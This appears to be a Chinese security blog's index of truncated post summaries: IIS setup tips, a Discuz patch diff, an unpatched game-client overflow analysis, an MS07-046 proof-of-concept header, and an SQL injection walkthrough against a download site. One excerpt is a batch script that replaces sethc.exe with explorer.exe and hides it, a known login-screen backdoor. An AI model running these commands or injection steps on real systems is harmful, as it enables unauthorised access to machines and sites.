摘要： SIX存在的意义： 1、有权限限制的地方总是让人比较放心，比如后台、内网 .... 。而且有的程序官方否认后台漏洞的危险，比如*vbbs对以前那个数据备用得到shell的态度。的确，在权限的限制下，这样的漏洞很难直接被利用。 Xss就和上面的情况一样，也经常被程序员忽视，而且也不太好防，如果2个情况配合起来，那就意味着利用的难度将大大下降... 2、然后有的人会说xss攻击完全可以... 阅读全文

摘要： 服务器安全设置 >> IIS6.0的安装 开始菜单—>控制面板—>添加或删除程序—>添加/删除Windows组件 应用程序 ———ASP.NET（可选） |——启用网络 COM+ 访问（必选） |——Internet 信息服务(IIS)———Internet 信息服务管理器（必选） |——公用文件（必选）... 阅读全文

摘要： 影响版本: 联众游戏大厅2.7.0.8 (2007年8月16日发布) 未受影响版本: 联众还没补 :-) 成因: 联众的程序员过于信任用户输入,未检测用户提供的字符串长度,导致对象虚函数表指针被覆盖,从而获得系统控制权. 分析: IE先创建obj_vuln对象(为什么要在SetInfo()执行前做这个,没进行分析),位置恰好在obj_now对象下: 03803034 /$ 56 PUSH E... 阅读全文

摘要： 对比补丁我们发现在\include\discuzcode.func.php里: $discuzcodes['searcharray']['bbcode_regexp'] = array( //标签的正则 "/\[align=([^\[\补丁前 "/\[float=([^\[\补丁后 "/\[float=(left|right)\]/i" 继续看下面的codz是杂处理这2个标签的： ... 阅读全文

摘要： 很多人都说什么ASP PHP JSP注射 其实注射最直接是跟数据库有关！然而那些脚本只是一种辅助 例如ASP/ASPX JSP 啥限制都没！而PHP则会把' 过滤为\' 但是若然不是MYSQL POSTGRESQL SQLITE的话这个功能就废了！ 但是我觉得这些脚本语言都不狠~如果CFM的话 估计你就没折了！ 具体各数据库相关信息请参看 ART OF WEB-SQL-INJECTION第1卷 感... 阅读全文

摘要： @echo off cls copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32 \dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h attrib c:\wi... 阅读全文

摘要： 先随便点一个软件下载 官方都更新到2.4了，但是还是官方自己再用，不过也有漏洞哦 把下载地址复制到明小子里面，把I改成%69 看到了吗，没有改之前是不能注入额 恭喜,该URL可以注入! 数据库类型:Access数据库 阅读全文

摘要： /* * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code * by Hong Gil-Dong & Chun Woo-Chi * Yang yeon(?~1542), Korea * "I shall keep clenching my left fist unitl i see the real tao". * ... 阅读全文

摘要： 在服务器上进行如下操作： 先在服务里关闭 iis admin service 服务. 找到 windows\system32\inetsrv\ 下的 metabase.xml 文件. 打开, 找到 ASPMaxRequestEntityAllowed 修改为需要的值(可修改为2M即: 2048000), 默认为: 204800, 即: 200K. 然后重启 iis... 阅读全文

摘要： 运行regsvr32 jscript.dll和 regsvr32 vbscript.dll 重新注册JAVA脚本和VB脚本的动态链接库后一切正常 阅读全文